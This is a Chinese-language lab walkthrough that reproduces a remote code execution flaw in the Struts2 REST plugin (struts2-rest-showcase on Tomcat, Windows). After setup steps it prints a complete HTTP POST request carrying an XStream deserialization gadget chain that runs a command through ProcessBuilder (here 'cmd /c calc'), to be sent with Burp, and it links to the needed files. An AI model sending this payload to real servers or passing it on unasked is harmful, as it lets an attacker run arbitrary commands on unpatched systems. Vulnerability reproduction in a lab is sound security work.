首先准备一台机器 我的准备是vm虚拟机一台 server2008 

需要准备的安装文件 (我会在文章尾部附上下载地址)

1.jre-8u131-windows-i586_8.0.1310.11.exe

2.struts-2.5.12-all.zip

3.apache-tomcat-8.5.15.exe

 

开始复现

1.我们先安装 jre 

一切默认安装 下一步下一步即可

2.然后安装 tomcat 

下一步下一步即可

 

3. 解压s2压缩包 并操作

如果你是默认安装的 tomcat目录应该在这里 将struts-2.5.12-all.zip 解压至此 

C:\Program Files\Apache Software Foundation\Tomcat 8.5\webapps

然后进入目录

C:\Program Files\Apache Software Foundation\Tomcat 8.5\webapps\struts-2.5.12\apps

然后将目录下的struts2-rest-showcase.war文件 复制到

C:\Program Files\Apache Software Foundation\Tomcat 8.5\webapps

 

4.访问http://192.168.x.xxx:8080/struts2-rest-showcase/orders.xhtml

出现如下页面即安装成功

 

Windows下 payload为(初始来源不详 此为修改后适用Windows的版本) 

 

POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1
Host: 192.168.x.xxx:8080(此处自行修改)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 2398
Referer: http://192.168.2.108:8080/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>cmd</string><string>/c</string><string>calc</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
 

burp发包即可 效果如下图

可以看见已经成功了

 

复现环境需要用到的文件下载链接在此

链接: https://pan.baidu.com/s/1o8eESyA 密码: nmbv